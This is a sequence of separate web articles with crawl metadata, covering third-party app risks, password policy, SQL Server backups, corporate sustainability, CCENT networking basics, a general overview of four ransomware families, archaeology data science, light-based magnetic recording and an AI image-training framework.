- Compatibility and Reliability: Third-party apps may not be as reliable or compatible with your device as apps provided by trusted sources. They may crash frequently, have compatibility issues with your operating system or other apps, or cause other technical problems.
- Lack of Updates and Support: Third-party apps may not receive regular updates or support from developers. This can lead to compatibility issues with new operating system versions or security vulnerabilities that go unpatched, leaving your device exposed to potential threats due to outdated technology.
- Inadequate User Reviews and Ratings: Unlike official app stores that have stricter review processes, third-party app sources often lack reliable user reviews and ratings. This makes it challenging to assess the quality, safety, and overall user experience of these apps.
- Legal and Copyright Issues: Some third-party apps may infringe upon intellectual property rights, such as copyrighted content or trademarks. Installing and using such apps could potentially lead to legal repercussions.
To minimize the risks associated with third-party apps, consider the precautions listed later in this article.

The Best Ways to Safeguard Your Device and Data from Third-Party Risks
Fortunately, for those of us running Google Apps and other cloud services, we have affordable solutions for monitoring and managing third-party app access to your data.
Our Recommendation to Shield Your Device from Potential Harm If you are running Google Apps, we generally recommend BetterCloud Enterprise as our preferred solution for several reasons: - The Domain Health and Insight Center provides you with activity reports, alerts, and advanced reporting - Bettercloud includes a robust suite of Google Apps admin tools that are not available in the Google Apps Admin Console, including bulk actions, dynamic groups, and a user deprovisioning wizard - BetterCloud monitors and lets you manage third party app access to any data within Google Apps, and provides a trust rating to help you determine which applications pose a risk - BetterCloud monitors activity in Drive against business rules to ensure compliance with data privacy policies and regulations. BetterCloud will proactively modify permissions and send alerts to prevent accidental or intentional violations. Additional Ways to Guard Against the Pitfalls of Third-Party Apps - Only download apps from trusted sources, such as official app stores or reputable websites. - Read reviews and ratings from other users before installing an app. - Check the permissions requested by the app and ensure they are necessary for its functionality. - Keep your device’s operating system and security software up to date. - Use reputable antivirus software to scan apps before installation. - Be cautious when granting excessive permissions or sharing sensitive information with apps. - Regularly review and remove any unused or suspicious apps from your device. How Cumulus Can Help Protect You From Third-Party App Risks While there is a minimum fee for BetterCloud Enterprise, you can try BetterCloud for free for up to 30 days. If you like what you see, we will waive the setup fees. If not, you can keep running the Domain Health and Insight Center for free.
<urn:uuid:04f73fa3-8d53-4f5b-9020-60ea5f2d68d8>
CC-MAIN-2024-38
https://www.cumulusglobal.com/tag/domain-health-insight-center/
2024-09-07T18:26:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00676.warc.gz
en
0.927214
1,026
2.53125
3
For a long time there was a myth among web users that changing passwords on a regular basis would help isolate them from cyber attacks. But Paul Edmonds, head of technology at the UK's National Cyber Crime Unit, claims that this is a fallacy spread by security experts. The cyber chief added that passwords changed on a regular basis make users less secure and more prone to cyber attacks. Speaking at a Security and Counter Terror Conference in London, he added that frequent password changes do not make users less prone to attacks – quite the opposite. Quoting the example of the security policy adopted by PayPal, Mr. Edmonds said that the financial gateway doesn't ask its customers to change their password for years; the reason is that if it did, it would lose money. Experts believe that by changing passwords on a regular basis, users tend to adopt weaker passwords, and this gradually exposes them to hackers.

Speaking at the conference about the ongoing online terror activity spread by Islamist groups, Rob Wainwright, the head of the European Union's policing agency Europol, concurred with Mr. Edmonds' opinion on regular password changes. He added that he still uses a two-year-old password to access his banking account, and that two-factor authentication helps isolate him from trouble. At the conference, Rob also discussed terrorist groups' use of online platforms for their illegal activities. He said that terror organizations are now busy developing their own social media platforms to avoid security crackdowns on their communication channels. Rob added that one such website being used by terror groups was taken down last week, which is how this came to light. Mr. Wainwright said that apps like Telegram, in particular, had been creating problems for Europol, and accused the firm of being evasive about its work objectives. He said that most companies, like Facebook, Google and WhatsApp, were coming forward to help the security agencies in counter-terror operations, but some firms like Telegram, which use strong encryption, were not cooperating in the mission of securing the UK populace from terror attacks. So he felt that a technical crackdown on them is needed in the near future. Rob Wainwright added that the much-needed security cooperation between the EU and Britain will continue as it does now, even after Brexit.

So, do you also believe that changing passwords on a regular basis no longer works in cyberspace? If not, please share your thoughts through the comments section below.
<urn:uuid:2a3c80e3-dbaf-42ad-aa9e-73680d4b464c>
CC-MAIN-2024-38
https://www.cybersecurity-insiders.com/password-change-doesnt-save-you-from-cyber-attacks/
2024-09-08T22:09:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00576.warc.gz
en
0.969363
517
2.65625
3
Last week I wrote about how easy it is to protect a SQL environment with Cohesity. This week we continue the conversation. Organizations that use Microsoft SQL Server sometimes struggle with how best to protect their SQL databases against accidental data loss. As is the case for other database platforms, there are a wide variety of tools and techniques available for protecting SQL Server, ranging from native built-in tools to third party commercial backup applications. In addition to there being a diverse collection of tools available for SQL Server backups, there are a variety of backup techniques that can be applied. Two of the more common techniques for example, are copy and dump. Dump can be thought of as either a tool or a technique. As a technique, dump refers to dumping SQL Server data to backup. As a tool, Dump refers to a command that is supported natively by Microsoft SQL Server. Although the Dump command still exists in SQL Server today, it is actually a legacy tool that exists solely for backward compatibility purposes. Originally, the Dump statement provided a way for administrators to backup SQL Server databases and transaction logs. An administrator could back up a database by using the DUMP DATABASE command. Similarly, transaction logs could be backed up by using the DUMP TRANSACTION command. The BACKUP command has largely replaced the DUMP command. SQL Server databases and log files can be backed up by using the BACKUP DATABASE and BACKUP LOG commands respectively. Whether an administrator uses the DUMP command or the BACKUP command, dump backups are very flexible. An administrator can use these commands to perform full, incremental, or differential backups. There are also a variety of management and monitoring capabilities that are supported by the command. Copy backups, which are sometimes referred to as copy only backups, are a variation on dump backups. In fact, a copy only backup uses the BACKUP command just like a DUMP backup does, but appends the COPY_ONLY argument. Copy only backups were first introduced in SQL Server 2005, and serve as a mechanism for creating a one-off backup that does not interfere with the normal backup sequence (from a transaction log file processing standpoint). Copy only backups are sometimes taken in an effort to preserve log files prior to attempting a restore operation, but they can be used for other purposes such as making a backup that can later be used as the basis for a test / dev environment. As previously noted, dump and copy only backups are both based on the BACKUP command. The BACKUP command has existed in SQL Server long enough for it to be considered stable and reliable. Even so, the BACKUP command is just that – a command. It provides a way of initiating backup operations from the command line. The main issue with using the BACKUP command is its sheer complexity. As you can see in the command’s documentation, the BACKUP command allows for a massive number of arguments and parameters. Admittedly, SQL Server administrators are used to dealing with complexity. When it comes to backup and restoration operations however, complexity is generally regarded as a bad thing. An overly complex backup solution carries with it a high potential for human error. Such errors can leave SQL Servers unprotected, while giving administrators the illusion that their backups are working properly. Although SQL Server has a reputation for being complex, data protection for SQL Server can actually be quite simple. 
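Before turning to that simpler approach, it may help to see what the copy-only technique described above looks like when driven from a script. This is a hedged sketch only: the server, database name, and backup path are placeholders, it assumes the pyodbc module and a SQL Server ODBC driver are installed, and it is meant to illustrate the native command rather than serve as a backup strategy.

```python
import pyodbc

# Placeholder connection details -- adjust for your environment.
CONN_STR = (
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=sql01;DATABASE=master;Trusted_Connection=yes;"
)

# A copy-only backup does not disturb the normal backup / log chain.
COPY_ONLY_BACKUP = r"""
BACKUP DATABASE [SalesDB]
TO DISK = N'D:\Backups\SalesDB_copyonly.bak'
WITH COPY_ONLY, COMPRESSION, STATS = 10;
"""

def run_copy_only_backup():
    # BACKUP cannot run inside a user transaction, so autocommit is required.
    conn = pyodbc.connect(CONN_STR, autocommit=True)
    try:
        cursor = conn.cursor()
        cursor.execute(COPY_ONLY_BACKUP)
        # Drain the informational result sets so the backup finishes
        # before the connection is closed.
        while cursor.nextset():
            pass
    finally:
        conn.close()

if __name__ == "__main__":
    run_copy_only_backup()
```

Even in this stripped-down form, the script hints at the complexity the article describes: the real BACKUP statement supports dozens of additional arguments, and getting retention, scheduling, and verification right is left entirely to the administrator.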
Cohesity has created a backup platform for SQL Server that is surprisingly easy to use. To get started, backup administrators must register their SQL Servers, which involves little more than specifying the servers that need to be protected and supplying administrative credentials. Once the organization's SQL Servers have been registered, the administrator needs only to create a protection job. Although the creation of SQL Server protection jobs is often a complex undertaking, Cohesity has pared the process down to four simple steps. Those steps consist of:
- Selecting the objects to be protected.
- Selecting a data protection policy.
- Specifying the job settings.
- Confirming the information presented on the summary screen.
Better still, Cohesity uses the same basic approach to creating a protection job, regardless of the type of resource that is being protected. As such, an administrator who knows how to use the Cohesity platform to back up resources such as VMware or Hyper-V already knows how to back up SQL Server.
In my third and final post in this three-part series, I will discuss using Cohesity for more efficient Test / Dev.
All blogs in this series:
- How Easy is it to Protect a SQL Environment with Cohesity?
- Protecting SQL Databases: Cohesity as an Alternative to Dumps and Copies
<urn:uuid:10212aec-ec1f-4bd3-9562-5b89dff02799>
CC-MAIN-2024-38
https://www.cohesity.com/blogs/protecting-sql-databases-cohesity/
2024-09-11T08:57:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00376.warc.gz
en
0.934193
974
3.046875
3
It is undeniable that the world today is facing numerous environmental issues such as global warming and climate change. As we continue to see the negative impacts of these issues, an increasing number of governments, organizations, and individuals are embracing and promoting environmental sustainability. Environmental sustainability is the ability to maintain an ecological balance in the planet's natural environment and conserve natural resources to support the wellbeing of current and future generations, and it has become a global imperative in the face of escalating ecological challenges.
One of the best ways to practice environmental sustainability is to prevent waste, whether it be finding new efficiencies, doing things smarter, or valuing every resource. According to World Bank statistics, the world generates 2.01 billion tons of municipal solid waste annually, with at least 33 percent of that not managed in an environmentally safe manner. Understanding how waste is produced and how it can be minimized, or even prevented, is the first step to reducing waste and protecting our environment; in that way, pollution prevention is an essential component of sustainability.
Another major contributor to environmental issues is Greenhouse Gas (GHG) emissions, the majority of which consist of Carbon Dioxide (CO2). GHG emissions from human activities have increased over the years; they build up in the atmosphere and warm the climate, leading to many other changes around the world, in the atmosphere, on land, and in the oceans. According to the International Energy Agency (IEA), global energy-related CO2 emissions grew by 0.9%, or 321 million metric tons, in 2022.
With the rise of global waste and carbon emissions, industries and businesses are changing their behaviors and investing in sustainability. Moreover, with the escalating environmental challenges, the concept of a circular economy has also emerged as a promising solution and has become a fundamental aspect of many business operations.
In this article, I would like to highlight Beyon's efforts towards environmental sustainability and share its journey in four main areas: managing energy usage, clean energy production, supply chain management, and waste management. Beyon has set sustainable objectives and commitments that are in line with national and international sustainable development goals and is on a mission to achieve them.
One part of Beyon's sustainability objectives involves using renewable energy. Beyon started its journey with renewable energy sources in 2021, when the first phase of the Company's solar park was established, and then expanded with phase 2 in 2023. Beyon's Solar Park Phases 1 and 2 generate 3.6 GWh of clean energy, leading to a carbon footprint saving of over 2,000 tons annually. Moreover, Beyon's Data Centre is the first in Bahrain to rely entirely on clean energy generated from the company's Solar Park, which is located at Beyon Data Oasis. Beyon is continuously exploring opportunities for renewable energy wherever possible. The company aims to power its business and network with renewables and is committed to powering it in the most sustainable way, while also making its network more efficient. 
For instance, the sunsetting of Batelco’s 2G network not only made way for transformation towards advanced mobile development but led to a reduction in electricity consumption as well as a reduction in CO2 emissions by an estimated 827 metric tons annually, which according to environmental studies is equivalent to the effect that approximately 30,000 trees would have on the environment. Another part of Beyon’s sustainability objectives is providing solutions that are environmentally friendly; these solutions include products such as Cloud based services, and Information and communications technology. A very popular product of Beyon’s portfolio is OneBox, which is a digital postbox solution delivered by Beyon Connect that enables communication services between the public and private sectors and individuals in one secure, convenient, and sustainable digital platform. A key benefit of OneBox is that it reduces the need to transport and physically deliver millions of mailed letters and documents, which supports a reduction of carbon footprint per capita. As mentioned previously, waste is a major contributor to the world’s pollution, and from the 2 billion tons of solid waste, around 40 million tons of electronic waste is generated every year, worldwide. That’s like throwing away 800 laptops every second. Waste prevention is a critical component to sustainability, therefore, as a tech company Beyon is adopting a circular economy approach, which is a method that encourages reuse, repair and recycle. It’s a conscious way of consuming resources and materials in a circular rather than a linear system, to reduce waste and prolong the life of materials. Beyon already started taking steps in adopting this approach, and one example of Beyon’s circular economy practice is its collaboration with a partner to repurpose its assets such as old tech devices, equipment, and cables. With such collaborations Beyon is trying to move away from a culture that uses and throws away to a culture of reuse, extending the life cycle of its products and making use of them rather than have them discarded as e-waste in landfills. Moreover, Beyon prefers to deal with suppliers that are environmentally conscious even in the smallest details of its operations. For instance, during corporate events, Beyon makes sure that the materials used for the events are reusable or recyclable or biodegradable in order to reduce the amount of waste generated from events. In conclusion, reducing environmental footprint is a challenge, but by focusing on areas of biggest impact and committing to actions across businesses, I believe we can create transformational change. Moreover, adopting a circular economy approach and capitalizing on its impact will also support the vision in reducing emissions and waste across businesses. Environmental sustainability and the conservation of natural resources are important, and it is our responsibility to act now and make conscious choices that prioritize the long-term wellbeing of our environment. No matter how small or big the steps we take, whether its organizations or individuals, through collective efforts, we can build a sustainable and resilient world for ourselves and future generations. An article by Maryam Al Ghatam – Public Relations Specialist, Beyon Corporate Comms. and Sustainability Department.
<urn:uuid:ae2a1842-bdea-4ba3-b778-574b8824b89b>
CC-MAIN-2024-38
https://beyon.com/2023/08/22/beyon-cares-beyond-now-beyons-efforts-towards-environmental-sustainability/
2024-09-13T21:33:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00176.warc.gz
en
0.953023
1,229
3.4375
3
As we venture into today's Cisco CCENT and CCNA exam scenario-based question, we will be covering the topic of collision and broadcast domains. It is very common to see questions on the CCNA or CCENT exam in which you need to identify the number of collision and broadcast domains based upon a topology diagram. So the first thing you need to be able to do is understand how to read a basic network topology, as you will see a multitude of these topology diagrams on the exam. Now, one of the things Cisco tries to do on the CCENT and CCNA exam is to confuse you with similar terminology, such as the terms collision domain and broadcast domain. So you need to make sure you understand the difference between the two and can pick out each in the topology diagram. So let's take a look at it.
CCENT & CCNA Exam Topology Question
Now that you have had a chance to review the diagram, let's take a look at the associated question. One thing you will want to note, though, for those of you trying to brain dump: Cisco is on to that, and what they are doing is slightly varying the topology diagram while giving the same set of answers. So that is why you really need to understand the material and not rely on brain dumps (also, if you do brain dump and get a job, you will be found out really quickly and be looking for work again).
Which of the following statements describe the network shown in the graphic? (Choose two)
A. There are two broadcast domains in the network.
B. There are six broadcast domains in the network.
C. There are four broadcast domains in the network.
D. There are five collision domains in the network.
E. There are seven collision domains in the network.
F. There are four collision domains in the network.
What we are going to do is start off with some of the theory behind this sort of question before we provide you with the answer. A collision domain is an area where frames that have collided are propagated; this usually happens when there is a hub or a repeater. A collision domain is usually broken up by a Layer 2 device such as a switch or a Layer 3 device such as a router. A broadcast domain is an area where all devices receive broadcast frames, such as a switched network that doesn't have VLANs. Routers usually break up broadcast domains.
In this scenario, there are 2 broadcast domains: one on the right side where there is a hub, and the other on the left side where there is a switch. The router breaks up the broadcast domain. Further, there are 5 collision domains: 1 on the right, since it is a hub, and on the left, each connection to the switch is its own collision domain, with the router breaking them up. So that leaves us with the correct answers of A and D.
Learning theory is great, but what really hammers home how this works is replicating this scenario in your CCENT and CCNA home lab. As you can see from the topology diagram, you can do this very easily. The device in the top center that is round with two arrows pointing in and two arrows pointing out is a router. The device on the left with the four arrows pointing out is a switch, and the device on the right with the single line and two arrows pointing out is a hub. These are networking industry standard diagrams which you will need to know for the exam. The router you will need will have to have two Ethernet ports on it. If you are unsure of which Cisco routers have two Ethernet ports, you can find a pretty good overview of them on our CCENT & CCNA Lab Suggestions page. You can then use any Cisco switch and any brand hub. 
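Before wiring anything up, it can also help to sanity-check the counting rules in a few lines of code. The sketch below is purely illustrative: the interface names are made up, and the number of hosts on each side is an assumption chosen to mirror the diagram described above.

```python
# Toy model of the topology: each router interface bounds one broadcast domain,
# and the device behind it determines how the collision domains are counted.
topology = {
    "router_fa0/0": {"device": "switch", "hosts": 3},  # left side of the diagram
    "router_fa0/1": {"device": "hub",    "hosts": 3},  # right side of the diagram
}

broadcast_domains = len(topology)  # routers break up broadcast domains

collision_domains = 0
for link in topology.values():
    if link["device"] == "switch":
        # Every switch port is its own collision domain: one per host,
        # plus one for the switch-to-router link.
        collision_domains += link["hosts"] + 1
    else:
        # A hub and everything plugged into it (router link included)
        # share a single collision domain.
        collision_domains += 1

print(broadcast_domains, "broadcast domains")  # 2
print(collision_domains, "collision domains")  # 5
```

The output matches answers A and D above; change the host counts or swap the hub for a switch and the totals shift accordingly.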
By recreating this lab topology, you will be able to use a program like Wireshark, which we include in our kits, and see how the traffic moves on the network and where the routers break up the broadcast domains. So while learning the theory behind the question is definitely valuable, seeing it work with real hands-on experience is what makes it sink in for most people so they don't forget the concept. If you are interested in some of our lab kits, you can see them below.
<urn:uuid:d4510a5c-2bea-40b3-a545-e9930d1328b7>
CC-MAIN-2024-38
https://www.certificationkits.com/ccent-ccna-exam-question-collision-broadcast-domains/
2024-09-13T22:39:42Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00176.warc.gz
en
0.960215
880
3.265625
3
Cisco CCENT Device Function and Packet Delivery
Now we will discuss device functions and the packet delivery process for OSI layers 1 through 3.
Cisco CCENT Layer 1 Device Function
The Physical layer defines the electrical, mechanical, procedural, and functional specifications for the physical link between end systems. Some common examples are Ethernet segments and serial links. The Physical layer sends bits between peer physical layers.
Cisco CCENT Layer 2 Device Function and Address
The Data Link layer (also called Layer 2) provides the physical transmission of the data and handles error notification, network topology, and flow control. Addresses at the Data Link layer (Layer 2) in a LAN environment are referred to as MAC addresses. Each device has a unique MAC address assigned by the vendor. The Data Link layer sends frames between peer data link layers.
Cisco CCENT Layer 2 Packet Delivery
Delivering an IP packet within a single LAN segment is pretty simple. If host A wants to send a packet to host B, it first must have an IP address to MAC address mapping for host B, since at Layer 2 packets are sent with MAC addresses as the source and destination addresses. If a mapping does not exist, host A will send an ARP Request (broadcast on the LAN segment) requesting the MAC address for IP address 192.168.1.1. Host B will receive the request and respond with an ARP Reply indicating the MAC address is 0080.007A.580C. Now that host A knows the MAC address associated with 192.168.1.1, it can send an IP packet with a destination address of 192.168.1.1. The Ethernet frame will have a source IP of 192.168.1.2, destination IP of 192.168.1.1, source MAC of 0023.5413.7F46, and destination MAC of 0080.007A.580C.
Cisco CCENT Layer 3 Address
Network layer (Layer 3) addresses are logical addresses assigned by a network administrator. The addresses shown in these examples are IPv4 addresses.
Cisco CCENT Layer 3 Packet Delivery
There are several steps involved in delivering an IP packet across a routed network. When a packet is not destined for the local network, the host sends it to its default gateway, which is the address of a directly connected router. For example, if host A wants to send a packet to host B, it will send the packet to its default gateway, which is the address of the router. In order to send a packet to the router, host A will need to know the MAC address of the router. To find this, host A sends an ARP packet asking for the MAC address that is associated with IP address 192.168.1.1. This packet is broadcast on the local network. The router receives the ARP Request and realizes it is for an IP address it has configured, so it responds with an ARP Reply indicating the MAC address is 0080.007A.580C.
Now that host A knows the MAC address associated with 192.168.1.1, it can send an IP packet with a destination address of 192.168.2.2. The packet will have a source IP of 192.168.1.2, destination IP of 192.168.2.2, source MAC of 0023.5413.7F46, and destination MAC of 0080.007A.580C. When the router receives the packet, it will send an ARP Request for 192.168.2.2. Host B receives the ARP Request and responds with an ARP Reply indicating the MAC address associated with IP address 192.168.2.2 is 0023.5476.A26B. Now that the router knows the MAC address of 192.168.2.2, it can send the packet. The Ethernet frame delivered to host B will have a source IP of 192.168.1.2, destination IP of 192.168.2.2, source MAC of 0080.00A3.4F73, and destination MAC of 0023.5476.A26B. 
Note: The packet delivered by the router has the same source and destination IP addresses but different source and destination MAC addresses.
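To see those two frames side by side, here is a small sketch using the Scapy library (an assumption: Scapy is not part of the original course material, and the ICMP payload is just a placeholder). The MAC addresses are the ones from the example above, rewritten from Cisco dotted notation into the colon notation Scapy expects.

```python
from scapy.all import Ether, IP, ICMP

HOST_A_MAC = "00:23:54:13:7f:46"  # host A (192.168.1.2)
ROUTER_E0  = "00:80:00:7a:58:0c"  # router interface facing the 192.168.1.0 network
ROUTER_E1  = "00:80:00:a3:4f:73"  # router interface facing the 192.168.2.0 network
HOST_B_MAC = "00:23:54:76:a2:6b"  # host B (192.168.2.2)

# Frame 1: host A hands the packet to its default gateway.
frame_a_to_router = (
    Ether(src=HOST_A_MAC, dst=ROUTER_E0)
    / IP(src="192.168.1.2", dst="192.168.2.2")
    / ICMP()
)

# Frame 2: the router forwards the same IP packet onto the second segment.
frame_router_to_b = (
    Ether(src=ROUTER_E1, dst=HOST_B_MAC)
    / IP(src="192.168.1.2", dst="192.168.2.2")
    / ICMP()
)

# The IP header stays the same hop to hop; only the Layer 2 addresses change.
for frame in (frame_a_to_router, frame_router_to_b):
    print(frame.summary())
```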
<urn:uuid:be2f9a94-0782-44b7-ac3a-400c775174a9>
CC-MAIN-2024-38
https://www.certificationkits.com/cisco-certification/ccent-640-822-icnd1-exam-study-guide/cisco-ccent-icnd1-640-822-exam-certification-guide/cisco-ccent-icnd1-packet-delivery/
2024-09-13T20:38:53Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00176.warc.gz
en
0.903437
886
3.21875
3
Cyber security is an issue that almost every single modern business has to be worried about. After all, nearly every company, no matter the size, depends on a computer system in one form or another. Protecting your data against harmful cyber-criminals is vital for many different reasons. You might have sensitive information regarding customers, employees, products, business plans, financial records, and more that you cannot afford to have compromised. That is why you must know how to defend against one of the most common types of hacking software – ransomware.
Ransomware – What is it?
Ransomware is a malicious type of software that breaches computer systems, much like malware – only cyber-criminals use ransomware to hack a device and gain access to whatever data they find. They then hold the data on the device hostage unless they are paid a ransom. Here are four of the most common kinds of ransomware.
Cerber is a relatively new ransomware that was developed back in 2017. However, what makes it so deadly is that the decryptor for each variant is available in 12 different languages. This made it much easier for the creator to build an affiliate system, essentially creating a ransomware-as-a-service platform that generated huge profits for the creator separate from their independent cyber-attacks. Cerber usually targets cloud-based Office 365 users through an elaborate phishing campaign.
Locky is a form of ransomware that's spread through spam, often disguised as an email message that looks like an invoice. Once opened, the user is instructed to activate macros to read it. Once the user does this, the ransomware will start encrypting files, requesting a ransom to unlock them.
Crylocker is ransomware that personalizes the ransom note by using data it locates on the user's computer, such as the user's name, location, birthday, system details, IP address, or Facebook account, to pressure the user. From here, it locks the user out of their computer and requests payment within 24 hours.
Jigsaw is a dangerous form of ransomware in that it will encrypt your files and start deleting them automatically until the ransom is paid in full. It deletes one or more files every hour throughout a 72-hour period. Once the 72 hours are over, all of the files that were encrypted will be removed.
En-Net Services Can Help Today
Experience a superior method of getting the public sector technology solutions you need through forming a partnership with En-Net Services. Our seasoned team members are familiar with the distinct purchasing and procurement cycles of state and local governments, as well as Federal, K-12 education, and higher education entities. En-Net is a certified Maryland Small Business Reserve with contract vehicles and sub-contracting partnerships to meet all contracting requirements. To find out more about our hardware services, printing, and imaging services, or to hear more about how a dynamic team can help meet your information technology needs, send us an email or give us a call at (301)-846-9901 today!
<urn:uuid:f15e3052-4d92-4981-afeb-83ed922f9afe>
CC-MAIN-2024-38
https://www.en-netservices.com/blog/the-4-most-common-kinds-of-ransomware/
2024-09-15T04:28:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00076.warc.gz
en
0.950954
622
2.828125
3
Democrata, a U.K.-based data-as-a-service provider, is reducing the risk of builders stumbling upon archaeological sites or artefacts during construction by tapping into and analysing data collected by public sector information bodies. "It's an expensive problem to have once you've started digging," Geoff Roberts, CEO of Democrata, told New Scientist. "We wanted to bring data science in as an added tool, so humans involved in the process could use it to understand what would likely be found," he said.
Democrata uses predictive algorithms to help locate and identify likely spots for buried artefacts before digging begins. Their algorithms are trained on data from a variety of sources, including the Forestry Commission, English Heritage and Land Registry, as well as 'grey literature', a huge wealth of unpublished records written by contractors every year. Democrata's data-driven approach helps save companies the time and cost of excavation. As New Scientist points out, archaeological services can amount to between 1 and 3 per cent of contractors' total construction cost.
However, Henry Chapman at the University of Birmingham, UK, raises concerns that approaches like Democrata's may hinder new archaeological discoveries. "If you think about the number of archaeological fieldwork excavations that take place purely for trying to find out about the past, that's a very small amount compared to all of the excavations done before commercial development," he told New Scientist.
Democrata showcased the program in front of engineering companies and government authorities for feedback last week. Read the full New Scientist write-up here. (Image credit: Cristiano Oliveira)
<urn:uuid:83d08e9f-fbbd-4e06-b53b-500eb1d5ddc3>
CC-MAIN-2024-38
https://dataconomy.com/2015/02/02/how-archaeology-and-data-science-are-helping-builders-to-avoid-buried-treasure/
2024-09-16T06:28:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00876.warc.gz
en
0.95417
354
2.671875
3
Scientists have created a way of processing data at superfast speeds using light pulses instead of electricity. The innovation uses magnets to record computer data while consuming virtually zero energy, solving the dilemma of how to create faster data processing speeds without the accompanying high energy costs.
Today's data centre servers consume between two and five percent of global electricity consumption, producing heat which in turn requires more power to cool the servers. The problem is so acute that Microsoft has even submerged hundreds of its data centre servers in the ocean in an effort to keep them cool and cut costs.
Most data is encoded as binary information (0 or 1 respectively) through the orientation of tiny magnets, called spins, in magnetic hard drives. The magnetic read/write head is used to set or retrieve information using electrical currents which dissipate huge amounts of energy. Now an international team publishing in Nature has solved the problem by replacing electricity with extremely short pulses of light – the duration of one trillionth of a second – concentrated by special antennas on top of a magnet. This new method is superfast but so energy efficient that the temperature of the magnet does not increase at all.
The team includes Dr Rostislav Mikhaylovskiy, formerly at Radboud University and now Lancaster University, Stefan Schlauderer, Dr Christoph Lange and Professor Rupert Huber from Regensburg University, Professor Alexey Kimel from Radboud University and Professor Anatoly Zvezdin from the Russian Academy of Sciences.
They demonstrated this new method by pulsing a magnet with ultrashort light bursts (with a duration of a millionth of a millionth of a second) at frequencies in the far infrared, the so-called terahertz spectral range. However, even the strongest existing sources of terahertz light did not provide strong enough pulses to switch the orientation of a magnet to date. The breakthrough was achieved by utilising the efficient interaction mechanism of coupling between spins and the terahertz electric field, which was discovered by the same team. The scientists then developed and fabricated a very small antenna on top of the magnet to concentrate and thereby enhance the electric field of the light. This enhanced local electric field was sufficient to switch the magnetisation of the magnet to its new orientation in just one trillionth of a second. The temperature of the magnet did not increase at all, as this process requires the energy of only one quantum of the terahertz light – a photon – per spin.
Dr Mikhaylovskiy said, "The record-low energy loss makes this approach scalable. Future storage devices would also exploit the excellent spatial definition of antenna structures, enabling practical magnetic memories with simultaneously maximal energy efficiency and speed."
He plans to carry out further research using the new ultrafast laser at Lancaster University, together with accelerators at the Cockcroft Institute, which are able to generate intense pulses of light to allow the switching of magnets and to determine the practical and fundamental speed and energy limits of magnetic recording.
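As a rough, back-of-envelope check on the "one photon per spin" claim, take a representative terahertz frequency of 1 THz (an assumption; the article does not state the exact frequency used):

\[
E_{\text{photon}} = h f \approx \left(6.63 \times 10^{-34}\ \mathrm{J\,s}\right)\left(10^{12}\ \mathrm{Hz}\right) \approx 6.6 \times 10^{-22}\ \mathrm{J} \approx 4\ \mathrm{meV}
\]

A few millielectronvolts per switched spin is an extraordinarily small energy budget compared with driving an electrical current through a conventional read/write head, which is consistent with the observation that the magnet's temperature does not measurably rise.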
<urn:uuid:b72899fc-499a-4d30-9b81-82d16dbcfbbc>
CC-MAIN-2024-38
https://datacentrereview.com/2019/05/scientists-use-light-pulses-to-create-energy-free-superfast-computing/
2024-09-18T18:45:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00676.warc.gz
en
0.929873
611
3.765625
4
Researchers at The University of Texas at Austin developed Ambient Diffusion, a framework for training AI models on corrupted images to prevent replication of copyrighted material.
- Cutting-edge AI models face scrutiny for replicating copyrighted images.
- Researchers at The University of Texas at Austin develop the Ambient Diffusion framework.
- Ambient Diffusion trains AI models solely on corrupted image-based data.
- Framework presented at NeurIPS and refined for broader applicability.
- Enables high-quality sample generation without exposure to original images.
- Balances performance and originality by controlling memorization.
- Highlights academia's commitment to societal needs and AI advancement.
Main AI News:
In the realm of cutting-edge artificial intelligence (AI), errors are not uncommon occurrences. From fabricating false information to replicating others' work erroneously, these instances can mar the reputation of otherwise potent AI models. Addressing this concern head-on, a team led by researchers at The University of Texas at Austin has pioneered a solution: a groundbreaking framework designed to train AI models using images rendered unrecognizable.
DALL-E, Midjourney, and Stable Diffusion stand as prominent examples of text-to-image diffusion generative AI models. Their capacity to transform arbitrary textual inputs into remarkably lifelike images has sparked admiration and controversy alike. However, these models now find themselves entangled in legal disputes with artists who claim that the generated outputs bear striking resemblance to their copyrighted works. Trained on extensive datasets comprising billions of image-text pairs, these AI models boast the ability to generate high-fidelity visuals based on textual cues. Yet, therein lies a potential pitfall: they may inadvertently draw upon copyrighted images, thus replicating them without authorization.
Enter Ambient Diffusion, the innovative framework poised to disrupt this status quo. Developed to circumvent such legal quandaries, this framework trains diffusion models exclusively on corrupted image-based data. Initial findings suggest that Ambient Diffusion enables the generation of high-quality samples without ever exposing the AI to recognizable source images.
Presented initially at NeurIPS, a prestigious machine-learning conference, in 2023, Ambient Diffusion has since undergone refinement and expansion. A subsequent paper, "Consistent Diffusion Meets Tweedie," published on the arXiv preprint server, has been accepted for presentation at the 2024 International Conference on Machine Learning. In collaboration with Constantinos Daskalakis of the Massachusetts Institute of Technology, the framework has been augmented to encompass training on datasets featuring images corrupted by diverse forms of noise, thereby extending its applicability.
Adam Klivans, a distinguished professor of computer science involved in the development of Ambient Diffusion, underscores its broad utility beyond the realm of AI. "The framework could prove invaluable for scientific and medical endeavors," he asserts. Indeed, applications abound in fields where obtaining pristine datasets proves arduous or prohibitively expensive, spanning from black hole imaging to specialized MRI scans. Klivans, alongside collaborator Alex Dimakis, a renowned professor of electrical and computer engineering, spearheaded the experimental validation of Ambient Diffusion. 
